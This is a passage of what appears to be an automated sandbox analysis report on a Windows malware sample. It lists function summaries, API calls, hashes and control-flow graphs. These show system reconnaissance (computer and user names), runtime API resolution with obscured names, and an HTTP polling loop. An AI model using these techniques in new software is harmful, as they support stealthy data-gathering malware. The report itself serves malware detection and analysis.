                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3749127164-2509457195
                    • Opcode ID: 9c7aa6552b214c897008999108c75b470cc8a04b2c378d29198254c0d9f118bc
                    • Instruction ID: 969521f7494b818dc9b86586d5e99c39a245d4c609939450835f65860d34fbe1
                    • Opcode Fuzzy Hash: 9c7aa6552b214c897008999108c75b470cc8a04b2c378d29198254c0d9f118bc
                    • Instruction Fuzzy Hash: 76714071A00218EBDB24DFA4DC49BEE7778FB44701F508159F5096B1D0DBB46A89CF91
                    Function 009678E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1275 9678e0-967937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 967942-967945 1275->1276 1277 967939-96793e 1275->1277 1278 967962-967972 1276->1278 1277->1278
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00967917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0096792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: a332decb25fef238df94d115717abda4f46150f0e760aeb35509c36b14c14063
                    • Instruction ID: d8b84ea89ea1c76df705313727dc72e6bef526249d0f252e200a5f3acedca1f7
                    • Opcode Fuzzy Hash: a332decb25fef238df94d115717abda4f46150f0e760aeb35509c36b14c14063
                    • Instruction Fuzzy Hash: 130181B1A04208EBD710DF99DE49BAAFBFCFB44B25F10425AFA45E3280D77459008BA1
                    Function 00967850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00967887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: 5d2aa75040908ff023b4733234e200946f9d77a34370047f12aa08576f7aca4b
                    • Instruction ID: ac3cffc8cedc081df24426c8166192e75ad7a402d2e5494205da62629060ea27
                    • Opcode Fuzzy Hash: 5d2aa75040908ff023b4733234e200946f9d77a34370047f12aa08576f7aca4b
                    • Instruction Fuzzy Hash: 06F044B1D44208ABC700DFD5DD49BAEFBB8E704711F10055AF615A3680C77819048BE1
                    Function 00951160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: f13618dd7d9bf88693169da9cfc09371639c9d13df7a7dd2b212770b2bbcb9be
                    • Instruction ID: 9c2ce5e1b61618e4652fdbec8018596134572e3728fee230b8be63027a573333
                    • Opcode Fuzzy Hash: f13618dd7d9bf88693169da9cfc09371639c9d13df7a7dd2b212770b2bbcb9be
                    • Instruction Fuzzy Hash: 55D05E7490430CDBCB00DFE0D94A6DDBB78FB08312F100596DD0563340EE306885CBA6
                    Function 00969C10 Relevance: 229.9, APIs: 112, Strings: 19, Instructions: 684libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 633 969c10-969c1a 634 96a036-96a0ca LoadLibraryA * 8 633->634 635 969c20-96a031 GetProcAddress * 43 633->635 636 96a146-96a14d 634->636 637 96a0cc-96a141 GetProcAddress * 5 634->637 635->634 638 96a216-96a21d 636->638 639 96a153-96a211 GetProcAddress * 8 636->639 637->636 640 96a21f-96a293 GetProcAddress * 5 638->640 641 96a298-96a29f 638->641 639->638 640->641 642 96a337-96a33e 641->642 643 96a2a5-96a332 GetProcAddress * 6 641->643 644 96a344-96a41a GetProcAddress * 9 642->644 645 96a41f-96a426 642->645 643->642 644->645 646 96a4a2-96a4a9 645->646 647 96a428-96a49d GetProcAddress * 5 645->647 648 96a4dc-96a4e3 646->648 649 96a4ab-96a4d7 GetProcAddress * 2 646->649 647->646 650 96a515-96a51c 648->650 651 96a4e5-96a510 GetProcAddress * 2 648->651 649->648 652 96a612-96a619 650->652 653 96a522-96a60d GetProcAddress * 10 650->653 651->650 654 96a67d-96a684 652->654 655 96a61b-96a678 GetProcAddress * 4 652->655 653->652 656 96a686-96a699 GetProcAddress 654->656 657 96a69e-96a6a5 654->657 655->654 656->657 658 96a6a7-96a703 GetProcAddress * 4 657->658 659 96a708-96a709 657->659 658->659
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,005A5E10), ref: 00969C2D
                    • GetProcAddress.KERNEL32(74DD0000,005A5B70), ref: 00969C45
                    • GetProcAddress.KERNEL32(74DD0000,005B9628), ref: 00969C5E
                    • GetProcAddress.KERNEL32(74DD0000,005B9658), ref: 00969C76
                    • GetProcAddress.KERNEL32(74DD0000,005B96D0), ref: 00969C8E
                    • GetProcAddress.KERNEL32(74DD0000,005B9670), ref: 00969CA7
                    • GetProcAddress.KERNEL32(74DD0000,005AB630), ref: 00969CBF
                    • GetProcAddress.KERNEL32(74DD0000,005BD128), ref: 00969CD7
                    • GetProcAddress.KERNEL32(74DD0000,005BD398), ref: 00969CF0
                    • GetProcAddress.KERNEL32(74DD0000,005BD308), ref: 00969D08
                    • GetProcAddress.KERNEL32(74DD0000,005BD230), ref: 00969D20
                    • GetProcAddress.KERNEL32(74DD0000,005A5C10), ref: 00969D39
                    • GetProcAddress.KERNEL32(74DD0000,005A5C30), ref: 00969D51
                    • GetProcAddress.KERNEL32(74DD0000,005A5C50), ref: 00969D69
                    • GetProcAddress.KERNEL32(74DD0000,005A5C70), ref: 00969D82
                    • GetProcAddress.KERNEL32(74DD0000,005BD170), ref: 00969D9A
                    • GetProcAddress.KERNEL32(74DD0000,005BD1D0), ref: 00969DB2
                    • GetProcAddress.KERNEL32(74DD0000,005AB978), ref: 00969DCB
                    • GetProcAddress.KERNEL32(74DD0000,005A5CF0), ref: 00969DE3
                    • GetProcAddress.KERNEL32(74DD0000,005BD350), ref: 00969DFB
                    • GetProcAddress.KERNEL32(74DD0000,005BD140), ref: 00969E14
                    • GetProcAddress.KERNEL32(74DD0000,005BD380), ref: 00969E2C
                    • GetProcAddress.KERNEL32(74DD0000,005BD368), ref: 00969E44
                    • GetProcAddress.KERNEL32(74DD0000,005A5E30), ref: 00969E5D
                    • GetProcAddress.KERNEL32(74DD0000,005BD2D8), ref: 00969E75
                    • GetProcAddress.KERNEL32(74DD0000,005BD2A8), ref: 00969E8D
                    • GetProcAddress.KERNEL32(74DD0000,005BD290), ref: 00969EA6
                    • GetProcAddress.KERNEL32(74DD0000,005BD188), ref: 00969EBE
                    • GetProcAddress.KERNEL32(74DD0000,005BD320), ref: 00969ED6
                    • GetProcAddress.KERNEL32(74DD0000,005BD1E8), ref: 00969EEF
                    • GetProcAddress.KERNEL32(74DD0000,005BD200), ref: 00969F07
                    • GetProcAddress.KERNEL32(74DD0000,005BD338), ref: 00969F1F
                    • GetProcAddress.KERNEL32(74DD0000,005BD2C0), ref: 00969F38
                    • GetProcAddress.KERNEL32(74DD0000,005BA840), ref: 00969F50
                    • GetProcAddress.KERNEL32(74DD0000,005BD3B0), ref: 00969F68
                    • GetProcAddress.KERNEL32(74DD0000,005BD158), ref: 00969F81
                    • GetProcAddress.KERNEL32(74DD0000,005A5D30), ref: 00969F99
                    • GetProcAddress.KERNEL32(74DD0000,005BD218), ref: 00969FB1
                    • GetProcAddress.KERNEL32(74DD0000,005A56D0), ref: 00969FCA
                    • GetProcAddress.KERNEL32(74DD0000,005BD1A0), ref: 00969FE2
                    • GetProcAddress.KERNEL32(74DD0000,005BD1B8), ref: 00969FFA
                    • GetProcAddress.KERNEL32(74DD0000,005A59B0), ref: 0096A013
                    • GetProcAddress.KERNEL32(74DD0000,005A5850), ref: 0096A02B
                    • LoadLibraryA.KERNEL32(005BD248,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A03D
                    • LoadLibraryA.KERNEL32(005BD3C8,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A04E
                    • LoadLibraryA.KERNEL32(005BD260,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A060
                    • LoadLibraryA.KERNEL32(005BD278,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A072
                    • LoadLibraryA.KERNEL32(005BD2F0,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A083
                    • LoadLibraryA.KERNEL32(005BD3E0,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A095
                    • LoadLibraryA.KERNEL32(005BD0F8,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A0A7
                    • LoadLibraryA.KERNEL32(005BD110,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A0B8
                    • GetProcAddress.KERNEL32(75290000,005A56F0), ref: 0096A0DA
                    • GetProcAddress.KERNEL32(75290000,005BD518), ref: 0096A0F2
                    • GetProcAddress.KERNEL32(75290000,005B9088), ref: 0096A10A
                    • GetProcAddress.KERNEL32(75290000,005BD4B8), ref: 0096A123
                    • GetProcAddress.KERNEL32(75290000,005A59D0), ref: 0096A13B
                    • GetProcAddress.KERNEL32(6FCD0000,005AB860), ref: 0096A160
                    • GetProcAddress.KERNEL32(6FCD0000,005A5710), ref: 0096A179
                    • GetProcAddress.KERNEL32(6FCD0000,005AB888), ref: 0096A191
                    • GetProcAddress.KERNEL32(6FCD0000,005BD428), ref: 0096A1A9
                    • GetProcAddress.KERNEL32(6FCD0000,005BD590), ref: 0096A1C2
                    • GetProcAddress.KERNEL32(6FCD0000,005A5870), ref: 0096A1DA
                    • GetProcAddress.KERNEL32(6FCD0000,005A5A10), ref: 0096A1F2
                    • GetProcAddress.KERNEL32(6FCD0000,005BD488), ref: 0096A20B
                    • GetProcAddress.KERNEL32(752C0000,005A5890), ref: 0096A22C
                    • GetProcAddress.KERNEL32(752C0000,005A5970), ref: 0096A244
                    • GetProcAddress.KERNEL32(752C0000,005BD4A0), ref: 0096A25D
                    • GetProcAddress.KERNEL32(752C0000,005BD5A8), ref: 0096A275
                    • GetProcAddress.KERNEL32(752C0000,005A57F0), ref: 0096A28D
                    • GetProcAddress.KERNEL32(74EC0000,005AB6F8), ref: 0096A2B3
                    • GetProcAddress.KERNEL32(74EC0000,005AB720), ref: 0096A2CB
                    • GetProcAddress.KERNEL32(74EC0000,005BD470), ref: 0096A2E3
                    • GetProcAddress.KERNEL32(74EC0000,005A58F0), ref: 0096A2FC
                    • GetProcAddress.KERNEL32(74EC0000,005A5A50), ref: 0096A314
                    • GetProcAddress.KERNEL32(74EC0000,005AB900), ref: 0096A32C
                    • GetProcAddress.KERNEL32(75BD0000,005BD440), ref: 0096A352
                    • GetProcAddress.KERNEL32(75BD0000,005A59F0), ref: 0096A36A
                    • GetProcAddress.KERNEL32(75BD0000,005B9028), ref: 0096A382
                    • GetProcAddress.KERNEL32(75BD0000,005BD3F8), ref: 0096A39B
                    • GetProcAddress.KERNEL32(75BD0000,005BD4D0), ref: 0096A3B3
                    • GetProcAddress.KERNEL32(75BD0000,005A5810), ref: 0096A3CB
                    • GetProcAddress.KERNEL32(75BD0000,005A5990), ref: 0096A3E4
                    • GetProcAddress.KERNEL32(75BD0000,005BD4E8), ref: 0096A3FC
                    • GetProcAddress.KERNEL32(75BD0000,005BD458), ref: 0096A414
                    • GetProcAddress.KERNEL32(75A70000,005A58B0), ref: 0096A436
                    • GetProcAddress.KERNEL32(75A70000,005BD500), ref: 0096A44E
                    • GetProcAddress.KERNEL32(75A70000,005BD410), ref: 0096A466
                    • GetProcAddress.KERNEL32(75A70000,005BD530), ref: 0096A47F
                    • GetProcAddress.KERNEL32(75A70000,005BD548), ref: 0096A497
                    • GetProcAddress.KERNEL32(75450000,005A5770), ref: 0096A4B8
                    • GetProcAddress.KERNEL32(75450000,005A5790), ref: 0096A4D1
                    • GetProcAddress.KERNEL32(75DA0000,005A56B0), ref: 0096A4F2
                    • GetProcAddress.KERNEL32(75DA0000,005BD560), ref: 0096A50A
                    • GetProcAddress.KERNEL32(6F070000,005A5930), ref: 0096A530
                    • GetProcAddress.KERNEL32(6F070000,005A58D0), ref: 0096A548
                    • GetProcAddress.KERNEL32(6F070000,005A5950), ref: 0096A560
                    • GetProcAddress.KERNEL32(6F070000,005BD578), ref: 0096A579
                    • GetProcAddress.KERNEL32(6F070000,005A57B0), ref: 0096A591
                    • GetProcAddress.KERNEL32(6F070000,005A5A30), ref: 0096A5A9
                    • GetProcAddress.KERNEL32(6F070000,005A57D0), ref: 0096A5C2
                    • GetProcAddress.KERNEL32(6F070000,005A5730), ref: 0096A5DA
                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0096A5F1
                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0096A607
                    • GetProcAddress.KERNEL32(75AF0000,005BCFA8), ref: 0096A629
                    • GetProcAddress.KERNEL32(75AF0000,005B8FB8), ref: 0096A641
                    • GetProcAddress.KERNEL32(75AF0000,005BCFD8), ref: 0096A659
                    • GetProcAddress.KERNEL32(75AF0000,005BD098), ref: 0096A672
                    • GetProcAddress.KERNEL32(75D90000,005A5A70), ref: 0096A693
                    • GetProcAddress.KERNEL32(6F9D0000,005BCE88), ref: 0096A6B4
                    • GetProcAddress.KERNEL32(6F9D0000,005A5830), ref: 0096A6CD
                    • GetProcAddress.KERNEL32(6F9D0000,005BCF30), ref: 0096A6E5
                    • GetProcAddress.KERNEL32(6F9D0000,005BD0B0), ref: 0096A6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: 0WZ$0XZ$0YZ$0ZZ$0\Z$0]Z$0^Z$HttpQueryInfoA$InternetSetOptionA$PXZ$PYZ$PZZ$P\Z$pWZ$pXZ$pYZ$pZZ$p[Z$p\Z
                    • API String ID: 2238633743-135805970
                    • Opcode ID: 84ae688f9238fdfaec65dccbcdf970c131d02c80e8d34167dd62c7ad73a52a8b
                    • Instruction ID: 51524164b36dad10dd1c7f5a48c053c24323c9648bb91590248543aecb6cdb7f
                    • Opcode Fuzzy Hash: 84ae688f9238fdfaec65dccbcdf970c131d02c80e8d34167dd62c7ad73a52a8b
                    • Instruction Fuzzy Hash: AC62FAB5614200AFC344DFA9EF999663BF9F78C601724851BA609C3274DE39A841DBE3
                    Function 00965510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 858 965510-965577 call 965ad0 call 96a820 * 3 call 96a740 * 4 874 96557c-965583 858->874 875 9655d7-96564c call 96a740 * 2 call 951590 call 9652c0 call 96a8a0 call 96a800 call 96aad0 StrCmpCA 874->875 876 965585-9655b6 call 96a820 call 96a7a0 call 951590 call 9651f0 874->876 902 965693-9656a9 call 96aad0 StrCmpCA 875->902 906 96564e-96568e call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 875->906 892 9655bb-9655d2 call 96a8a0 call 96a800 876->892 892->902 907 9656af-9656b6 902->907 908 9657dc-965844 call 96a8a0 call 96a820 * 2 call 951670 call 96a800 * 4 call 966560 call 951550 902->908 906->902 910 9656bc-9656c3 907->910 911 9657da-96585f call 96aad0 StrCmpCA 907->911 1037 965ac3-965ac6 908->1037 915 9656c5-965719 call 96a820 call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 910->915 916 96571e-965793 call 96a740 * 2 call 951590 call 9652c0 call 96a8a0 call 96a800 call 96aad0 StrCmpCA 910->916 930 965865-96586c 911->930 931 965991-9659f9 call 96a8a0 call 96a820 * 2 call 951670 call 96a800 * 4 call 966560 call 951550 911->931 915->911 916->911 1014 965795-9657d5 call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 916->1014 937 965872-965879 930->937 938 96598f-965a14 call 96aad0 StrCmpCA 930->938 931->1037 945 9658d3-965948 call 96a740 * 2 call 951590 call 9652c0 call 96a8a0 call 96a800 call 96aad0 StrCmpCA 937->945 946 96587b-9658ce call 96a820 call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 937->946 966 965a16-965a21 Sleep 938->966 967 965a28-965a91 call 96a8a0 call 96a820 * 2 call 951670 call 96a800 * 4 call 966560 call 951550 938->967 945->938 1043 96594a-96598a call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 945->1043 946->938 966->874 967->1037 1014->911 1043->938
                    APIs
                      • Part of subcall function 0096A820: lstrlen.KERNEL32(00954F05,?,?,00954F05,00970DDE), ref: 0096A82B
                      • Part of subcall function 0096A820: lstrcpy.KERNEL32(00970DDE,00000000), ref: 0096A885
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009656A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965857
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965228
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 009652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965318
                      • Part of subcall function 009652C0: lstrlen.KERNEL32(00000000), ref: 0096532F
                      • Part of subcall function 009652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00965364
                      • Part of subcall function 009652C0: lstrlen.KERNEL32(00000000), ref: 00965383
                      • Part of subcall function 009652C0: lstrlen.KERNEL32(00000000), ref: 009653AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0096578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00965A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: 900c406d11f2a535056ad9c779c321dbd575fdaa4d4904158c38431b6d588f25
                    • Instruction ID: 888875068a71655f85af736a59fb2ce0e310b91d214a854f3675bb5b9dcb84a2
                    • Opcode Fuzzy Hash: 900c406d11f2a535056ad9c779c321dbd575fdaa4d4904158c38431b6d588f25
                    • Instruction Fuzzy Hash: E4E1FD72910104AACB18FBB0DD96BED737DAFD4340F508529B50667195EF34AA09CFA2
                    Function 009617A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                    Download Yara Rule

